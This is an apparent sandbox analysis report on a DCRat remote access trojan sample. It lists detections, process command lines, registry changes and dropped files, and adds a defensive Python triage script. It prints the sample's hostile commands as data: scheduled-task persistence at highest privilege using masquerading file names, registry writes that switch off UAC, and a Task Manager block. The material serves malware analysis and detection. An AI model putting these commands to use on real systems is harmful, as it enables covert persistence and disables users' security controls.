File name: bot.exe

Full analysis: https://app.any.run/tasks/2a3aab1b-651b-4387-bb6d-ade0e85c1eeb
Verdict: Malicious activity
Threats:

DCRat, also known as Dark Crystal RAT, is a remote access trojan (RAT) first seen in 2018. It is modular malware that can be customized for different tasks: stealing passwords and cryptocurrency wallet data, hijacking Telegram and Steam accounts, and more. Attackers distribute DCRat in a variety of ways, but phishing email campaigns are the most common.

Analysis date: November 03, 2024, 21:18:45
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: rat, dcrat, remote, darkcrystal
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5: D9F7208D0116DCDE22ECE5048AC6C37D
SHA1: F9B23D695BB875F032292983FE537C48BC02A657
SHA256: 15BA1DE7E069B6615CC13A43CC2B50426065E92E018066B0E3A3AF43BBA522EE
SSDEEP: 98304:ZFrKdQIu4rQQj8Uig2JVb+oNUjm4gOx52L+qKXiO+b54OI80CvGNl82V89k33MCD:Zn3GbMybtP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses sleep, probably for detection evasion (SCRIPT)

      • wscript.exe (PID: 6756)
    • UAC/LUA settings modification

      • Containerreview.exe (PID: 4956)
    • DARKCRYSTAL has been detected (SURICATA)

      • OfficeClickToRun.exe (PID: 5580)
    • Connects to the CnC server

      • OfficeClickToRun.exe (PID: 5580)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • bot.exe (PID: 6696)
      • Containerreview.exe (PID: 4956)
      • OfficeClickToRun.exe (PID: 5580)
    • Reads security settings of Internet Explorer

      • bot.exe (PID: 6696)
      • ShellExperienceHost.exe (PID: 6384)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6756)
      • Containerreview.exe (PID: 4956)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 6756)
      • Containerreview.exe (PID: 4956)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6756)
    • The executable file from the user directory is run by the CMD process

      • Containerreview.exe (PID: 4956)
    • Executed via WMI

      • schtasks.exe (PID: 6204)
      • schtasks.exe (PID: 5948)
      • schtasks.exe (PID: 6392)
      • schtasks.exe (PID: 2484)
      • schtasks.exe (PID: 6396)
      • schtasks.exe (PID: 6356)
      • schtasks.exe (PID: 1884)
      • schtasks.exe (PID: 4476)
      • schtasks.exe (PID: 6128)
      • schtasks.exe (PID: 920)
      • schtasks.exe (PID: 6556)
      • schtasks.exe (PID: 2652)
      • schtasks.exe (PID: 6736)
      • schtasks.exe (PID: 6548)
      • schtasks.exe (PID: 6912)
      • schtasks.exe (PID: 6572)
      • schtasks.exe (PID: 4448)
      • schtasks.exe (PID: 696)
      • schtasks.exe (PID: 5920)
      • schtasks.exe (PID: 5160)
      • schtasks.exe (PID: 4836)
      • schtasks.exe (PID: 3000)
      • schtasks.exe (PID: 6288)
      • schtasks.exe (PID: 4312)
    • The process creates files with name similar to system file names

      • Containerreview.exe (PID: 4956)
    • Executes as Windows Service

      • WmiApSrv.exe (PID: 5372)
      • VSSVC.exe (PID: 5064)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6292)
    • Probably delays execution using 'w32tm.exe'

      • cmd.exe (PID: 6684)
    • The process executes VB scripts

      • OfficeClickToRun.exe (PID: 5580)
    • Contacting a server suspected of hosting a CnC

      • OfficeClickToRun.exe (PID: 5580)
  • INFO

    • Checks supported languages

      • bot.exe (PID: 6696)
      • Containerreview.exe (PID: 4956)
      • ShellExperienceHost.exe (PID: 6384)
    • Creates files or folders in the user directory

      • bot.exe (PID: 6696)
    • Drops encrypted VBS script (Microsoft Script Encoder)

      • bot.exe (PID: 6696)
      • wscript.exe (PID: 6756)
    • The process uses the downloaded file

      • bot.exe (PID: 6696)
      • wscript.exe (PID: 6756)
    • Reads the computer name

      • bot.exe (PID: 6696)
      • Containerreview.exe (PID: 4956)
      • ShellExperienceHost.exe (PID: 6384)
    • Process checks computer location settings

      • bot.exe (PID: 6696)
    • Reads Environment values

      • Containerreview.exe (PID: 4956)
    • Reads the machine GUID from the registry

      • Containerreview.exe (PID: 4956)
    • Process checks whether UAC notifications are on

      • Containerreview.exe (PID: 4956)
    • Creates files in the program directory

      • Containerreview.exe (PID: 4956)
    • Application launched itself

      • msedge.exe (PID: 2140)
      • msedge.exe (PID: 5532)
    • Manual execution by a user

      • msedge.exe (PID: 5532)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:12:01 18:00:55+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 201216
InitializedDataSize: 114176
UninitializedDataSize: -
EntryPoint: 0x1ec40
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
All screenshots are available in the full report
Total processes: 222
Monitored processes: 90
Malicious processes: 6
Suspicious processes: 0

Behavior graph

Processes in the behavior graph, in the order shown (processes marked "no specs" triggered no signatures): bot.exe, wscript.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), containerreview.exe, shellexperiencehost.exe (no specs), the schtasks.exe instances (no specs; 24 PIDs are listed under "Executed via WMI" above), cmd.exe (no specs), conhost.exe (no specs), reg.exe (no specs), w32tm.exe (no specs), officeclicktorun.exe (tagged #DARKCRYSTAL), wscript.exe ×2 (no specs), SPPSurrogate (no specs), vssvc.exe (no specs), wmiapsrv.exe (no specs), a large number of msedge.exe browser child processes (all but two without signatures), identity_helper.exe ×2 (no specs), and a second bot.exe (no specs).

Process information

Each entry gives the PID, command line, image path and parent process, then user, company, integrity level, description, exit code (where recorded) and file version, followed by the first loaded modules.
PID 336 | Parent: msedge.exe
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=1204 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
User: admin | Company: Microsoft Corporation | Integrity level: LOW | Description: Microsoft Edge | Exit code: 0 | Version: 122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 356 | Parent: msedge.exe
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7292 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
User: admin | Company: Microsoft Corporation | Integrity level: LOW | Description: Microsoft Edge | Exit code: 0 | Version: 122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 360 | Parent: msedge.exe
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6328 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
User: admin | Company: Microsoft Corporation | Integrity level: LOW | Description: Microsoft Edge | Exit code: 0 | Version: 122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 624 | Parent: msedge.exe
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3932 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:1
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
User: admin | Company: Microsoft Corporation | Integrity level: LOW | Description: Microsoft Edge | Exit code: 0 | Version: 122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 696 | Parent: WmiPrvSE.exe
CMD: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Program Files\WindowsPowerShell\Modules\OfficeClickToRun.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
User: admin | Company: Microsoft Corporation | Integrity level: HIGH | Description: Task Scheduler Configuration Tool | Exit code: 0 | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 920 | Parent: WmiPrvSE.exe
CMD: schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\found.000\dir0001.chk\ApplicationFrameHost.exe'" /f
Path: C:\Windows\System32\schtasks.exe
User: admin | Company: Microsoft Corporation | Integrity level: HIGH | Description: Task Scheduler Configuration Tool | Exit code: 0 | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 1068 | Parent: msedge.exe
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2480 --field-trial-handle=2272,i,16656097283237007611,2784772124393046249,262144 --variations-seed-version /prefetch:3
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
User: admin | Company: Microsoft Corporation | Integrity level: HIGH | Description: Microsoft Edge | Exit code: 0 | Version: 122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 1160 | Parent: msedge.exe
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7408 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
User: admin | Company: Microsoft Corporation | Integrity level: LOW | Description: Microsoft Edge | Exit code: 0 | Version: 122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 1176 | Parent: OfficeClickToRun.exe
CMD: "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\b2dafb7f-e363-45cd-93d3-7f6421e8aca7.vbs"
Path: C:\Windows\System32\wscript.exe
User: admin | Company: Microsoft Corporation | Integrity level: HIGH | Description: Microsoft ® Windows Based Script Host | Exit code: not recorded | Version: 5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 1584 | Parent: msedge.exe
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6980 --field-trial-handle=2780,i,5143621202633466178,9606365182877278334,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
User: admin | Company: Microsoft Corporation | Integrity level: LOW | Description: Microsoft Edge | Exit code: 0 | Version: 122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 16 814
Read events: 16 682
Write events: 132
Delete events: 0

Modification events

(PID 6696) bot.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids | Operation: write | Name: VBEFile | Value: (empty)
(PID 4956) Containerreview.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Operation: write | Name: EnableLUA | Value: 0
(PID 4956) Containerreview.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Operation: write | Name: ConsentPromptBehaviorAdmin | Value: 0
(PID 4956) Containerreview.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Operation: write | Name: PromptOnSecureDesktop | Value: 0
(PID 4956) Containerreview.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 | Operation: write | Name: CheckSetting | Value: 23004100430042006C006F00620000000000000000000000010000000000000000000000
(PID 6384) ShellExperienceHost.exe | Key: \REGISTRY\A\{6900bf3c-db31-c9e6-76df-e79a5de33f0e}\LocalState | Operation: write | Name: PeekBadges | Value: 5B005D000000B18E4204362EDB01
(PID 4956) Containerreview.exe | Key: HKEY_CURRENT_USER\SOFTWARE\a7e6030628590f71478fff3b2ca5ef0474dc14a1 | Operation: write | Name: b3115a2183f8dfecdcc63140a965a00b30f4148a | Value (base64): WyJDOlxcVXNlcnNcXGFkbWluXFxBcHBEYXRhXFxSb2FtaW5nXFxCcmlkZ2VhZ2VudEZvbnRcXENvbnRhaW5lcnJldmlldy5leGUiLCJDOlxcVXNlcnNcXERlZmF1bHQgVXNlclxcZGFzSG9zdC5leGUiLCJDOlxcZm91bmQuMDAwXFxkaXIwMDAxLmNoa1xcQ29udGFpbmVycmV2aWV3LmV4ZSIsIkM6XFxmb3VuZC4wMDBcXGRpcjAwMDAuY2hrXFxTeXN0ZW1TZXR0aW5ncy5leGUiLCJDOlxcZm91bmQuMDAwXFxkaXIwMDAxLmNoa1xcQXBwbGljYXRpb25GcmFtZUhvc3QuZXhlIiwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFdpbmRvd3MgTlRcXFRhYmxlVGV4dFNlcnZpY2VcXGVuLVVTXFxkYXNIb3N0LmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzXFxXaW5kb3dzUG93ZXJTaGVsbFxcTW9kdWxlc1xcT2ZmaWNlQ2xpY2tUb1J1bi5leGUiLCJDOlxcVXNlcnNcXEFkbWluaXN0cmF0b3JcXERlc2t0b3BcXFVzZXJPT0JFQnJva2VyLmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzICh4ODYpXFxNaWNyb3NvZnQuTkVUXFxSZWRpc3RMaXN0XFx3aW5sb2dvbi5leGUiXQ==
(PID 4956) Containerreview.exe | Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | Operation: write | Name: C:\WINDOWS\System32\cmd.exe.FriendlyAppName | Value: Windows Command Processor
(PID 4956) Containerreview.exe | Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | Operation: write | Name: C:\WINDOWS\System32\cmd.exe.ApplicationCompany | Value: Microsoft Corporation
(PID 2652) reg.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Operation: write | Name: DisableTaskMgr | Value: 1
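The process table shows two of the schtasks.exe invocations (one with /rl HIGHEST, both pointing at copies of the sample that borrow the names of Windows binaries), and the modification events show Containerreview.exe switching off the UAC policy values, reg.exe disabling Task Manager, and a base64 string written under HKCU\SOFTWARE\a7e6…14a1. That string decodes to a JSON array of nine file paths, matching the dropped-file entries and the scheduled-task targets. The Python below is an added triage example written for this page; it is not ANY.RUN's code or DCRat's. It parses the two command lines, decodes the registry value, cross-checks task targets against the decoded list, flags targets whose file name belongs to a Windows binary but whose directory is not where that binary ships (the expected-directory table is this example's own assumption), and lists the policy writes. The event list is constructed from the report's rows.

```python
import base64
import json
import re

# Copied from this report: the two schtasks command lines shown in the process
# table and the relevant rows of "Modification events". The list layout is
# constructed for the example.
SCHTASKS_CMDLINES = [
    r'''schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Program Files\WindowsPowerShell\Modules\OfficeClickToRun.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\found.000\dir0001.chk\ApplicationFrameHost.exe'" /f''',
]
POLICY_KEY = r"\Microsoft\Windows\CurrentVersion\Policies\System"
REG_EVENTS = [  # (pid, process, key, value name, data)
    (4956, "Containerreview.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE" + POLICY_KEY, "EnableLUA", "0"),
    (4956, "Containerreview.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE" + POLICY_KEY, "ConsentPromptBehaviorAdmin", "0"),
    (4956, "Containerreview.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE" + POLICY_KEY, "PromptOnSecureDesktop", "0"),
    (2652, "reg.exe", r"HKEY_CURRENT_USER\SOFTWARE" + POLICY_KEY, "DisableTaskMgr", "1"),
    (4956, "Containerreview.exe", r"HKEY_CURRENT_USER\SOFTWARE\a7e6030628590f71478fff3b2ca5ef0474dc14a1",
     "b3115a2183f8dfecdcc63140a965a00b30f4148a",
     "WyJDOlxcVXNlcnNcXGFkbWluXFxBcHBEYXRhXFxSb2FtaW5nXFxCcmlkZ2VhZ2VudEZvbnRcXENvbnRhaW5lcnJldmlldy5leGUiLCJDOlxcVXNlcnNcXERlZmF1bHQgVXNlclxcZGFzSG9zdC5leGUiLCJDOlxcZm91bmQuMDAwXFxkaXIwMDAxLmNoa1xcQ29udGFpbmVycmV2aWV3LmV4ZSIsIkM6XFxmb3VuZC4wMDBcXGRpcjAwMDAuY2hrXFxTeXN0ZW1TZXR0aW5ncy5leGUiLCJDOlxcZm91bmQuMDAwXFxkaXIwMDAxLmNoa1xcQXBwbGljYXRpb25GcmFtZUhvc3QuZXhlIiwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFdpbmRvd3MgTlRcXFRhYmxlVGV4dFNlcnZpY2VcXGVuLVVTXFxkYXNIb3N0LmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzXFxXaW5kb3dzUG93ZXJTaGVsbFxcTW9kdWxlc1xcT2ZmaWNlQ2xpY2tUb1J1bi5leGUiLCJDOlxcVXNlcnNcXEFkbWluaXN0cmF0b3JcXERlc2t0b3BcXFVzZXJPT0JFQnJva2VyLmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzICh4ODYpXFxNaWNyb3NvZnQuTkVUXFxSZWRpc3RMaXN0XFx3aW5sb2dvbi5leGUiXQ=="),
]

# Value name -> data that weakens the control (UAC off, admins auto-elevate,
# no secure desktop, Task Manager blocked).
WEAKENING = {"EnableLUA": "0", "ConsentPromptBehaviorAdmin": "0",
             "PromptOnSecureDesktop": "0", "DisableTaskMgr": "1"}

# Where Windows normally keeps binaries with these names. This reference table
# is the example's own assumption, not data from the report.
EXPECTED_DIR = {
    "applicationframehost.exe": r"c:\windows\system32",
    "dashost.exe": r"c:\windows\system32",
    "winlogon.exe": r"c:\windows\system32",
    "useroobebroker.exe": r"c:\windows\system32\oobe",
    "systemsettings.exe": r"c:\windows\immersivecontrolpanel",
    "officeclicktorun.exe": r"c:\program files\common files\microsoft shared\clicktorun",
}


def parse_schtasks(cmdline):
    """Extract name, schedule, target and run level from 'schtasks /create'."""
    def opt(flag):
        m = re.search(r'/%s\s+(?:"([^"]*)"|(\S+))' % flag, cmdline, re.I)
        if not m:
            return None
        return m.group(1) if m.group(1) is not None else m.group(2)
    return {
        "name": opt("tn"),
        "schedule": opt("sc"),
        "modifier": int(opt("mo")) if opt("mo") else None,
        # the sample nests the path in single quotes inside the double quotes
        "target": (opt("tr") or "").strip("'"),
        "highest": (opt("rl") or "").upper() == "HIGHEST",
        "force": "/f" in cmdline.lower().split(),
    }


def is_masquerading(path):
    """True when the file name belongs to a well-known Windows binary but the
    directory is not the one that binary ships in."""
    directory, _, name = path.lower().rpartition("\\")
    expected = EXPECTED_DIR.get(name)
    return expected is not None and directory != expected


def find_policy_tampering(events):
    """Registry writes that switch off UAC prompting or Task Manager."""
    return [(pid, proc, name, data) for pid, proc, key, name, data in events
            if key.lower().endswith(POLICY_KEY.lower()) and WEAKENING.get(name) == data]


def decode_install_list(events):
    r"""The sample writes base64(JSON array of paths) under HKCU\SOFTWARE\<40 hex
    chars>; locate that value and decode it."""
    for _, _, key, _, data in events:
        if re.fullmatch(r"HKEY_CURRENT_USER\\SOFTWARE\\[0-9a-f]{40}", key, re.I):
            return json.loads(base64.b64decode(data))
    return []


def triage(cmdlines=SCHTASKS_CMDLINES, events=REG_EVENTS):
    """Combine the checks into one report-shaped dictionary."""
    tasks = [parse_schtasks(c) for c in cmdlines]
    install_list = decode_install_list(events)
    installed = {p.lower() for p in install_list}
    for t in tasks:
        t["masquerading"] = is_masquerading(t["target"])
        t["in_install_list"] = t["target"].lower() in installed
    return {
        "tasks": tasks,
        "install_list": install_list,
        "masquerading_copies": [p for p in install_list if is_masquerading(p)],
        "policy_tampering": find_policy_tampering(events),
    }


if __name__ == "__main__":
    print(json.dumps(triage(), indent=2))
```

Running it shows both task targets inside the decoded nine-path list, seven of the nine copies sitting in directories that do not match their borrowed file names, and the four policy writes. On a live host the same logic applies to schtasks command lines from process-creation telemetry (Sysmon event 1 or 4688) and to registry-set events (Sysmon event 13) for the Policies\System key.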
Executable files: 51
Suspicious files: 252
Text files: 56
Unknown types: 1

Dropped files

PID | Process | Filename | Type
4956 | Containerreview.exe | C:\Users\Default\21b1a557fd31cc | text
MD5: BC506563DDFFEC635E9B6C7680C229CC
SHA256: B73C623D5CAF2D380453413F017C02B312B9A5F7D36ADEF1CDD520F17148E287
4956 | Containerreview.exe | (filename, type and hashes not recorded in the report)
6696 | bot.exe | C:\Users\admin\AppData\Roaming\BridgeagentFont\LMbhEUlzAGhXQ88TEAwD9DBna.bat | text
MD5: 3765C22496F7FD5EABD91A49EF3156DD
SHA256: 21BCED2882FCD08EDDD626FCFD74964FB4387CE489D6A42D382C016F05B36564
6696 | bot.exe | C:\Users\admin\AppData\Roaming\BridgeagentFont\E1OrDChd6wfhvlLu9Zc8rvL1kfwV.vbe | binary
MD5: 980B8C4323C6A30ADEFA83E5889189EB
SHA256: 20B473780053528B67968274F63A4FD23CBF74E019B7532E0ACB5D5B9FDAA2D4
4956 | Containerreview.exe | C:\found.000\dir0000.chk\SystemSettings.exe | executable
MD5: E5CC3D0DE29F576E27666E7C6738A584
SHA256: EEC25BBB0C3EA26E79B4162E8B1A1AA42B9F6B83D2FC710865001CF8750FE24B
4956 | Containerreview.exe | C:\Users\Default\dasHost.exe | executable
MD5: E5CC3D0DE29F576E27666E7C6738A584
SHA256: EEC25BBB0C3EA26E79B4162E8B1A1AA42B9F6B83D2FC710865001CF8750FE24B
6696 | bot.exe | C:\Users\admin\AppData\Roaming\BridgeagentFont\Containerreview.exe | executable
MD5: E5CC3D0DE29F576E27666E7C6738A584
SHA256: EEC25BBB0C3EA26E79B4162E8B1A1AA42B9F6B83D2FC710865001CF8750FE24B
4956 | Containerreview.exe | C:\found.000\dir0001.chk\ApplicationFrameHost.exe | executable
MD5: E5CC3D0DE29F576E27666E7C6738A584
SHA256: EEC25BBB0C3EA26E79B4162E8B1A1AA42B9F6B83D2FC710865001CF8750FE24B
4956 | Containerreview.exe | C:\found.000\dir0001.chk\Containerreview.exe | executable
MD5: E5CC3D0DE29F576E27666E7C6738A584
SHA256: EEC25BBB0C3EA26E79B4162E8B1A1AA42B9F6B83D2FC710865001CF8750FE24B
4956 | Containerreview.exe | C:\found.000\dir0001.chk\6e248630e82c92 | text
MD5: 0AD50712D12A2AD18E9E19C053BC6CBF
SHA256: 7F3CBEE778289EDFA572DF2AD24A5C44F2AFD673EC6541F7B5815679C1431B38

All five dropped executables share one SHA256 (EEC25BBB…FE24B): they are byte-identical copies of the Containerreview.exe payload that bot.exe first wrote to %AppData%\BridgeagentFont, placed under names of legitimate Windows binaries.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 371
TCP/UDP connections: 149
DNS requests: 119
Threats: 12

HTTP requests

PID | Process | Method | Code | IP | URL | CN | Type | Size | Reputation
6944 | svchost.exe | GET | 200 | 104.103.72.96:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | AT | binary | 1.01 Kb | whitelisted
5488 | MoUsoCoreWorker.exe | GET | 200 | 104.103.72.96:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | AT | binary | 1.01 Kb | whitelisted
7044 | RUXIMICS.exe | GET | 200 | 104.103.72.96:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | AT | binary | 1.01 Kb | whitelisted
6944 | svchost.exe | GET | - | 2.18.69.217:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | AT | - | - | whitelisted
5488 | MoUsoCoreWorker.exe | GET | - | 2.18.69.217:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | AT | - | - | whitelisted
7044 | RUXIMICS.exe | GET | 200 | 2.18.69.217:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | AT | binary | 973 b | whitelisted
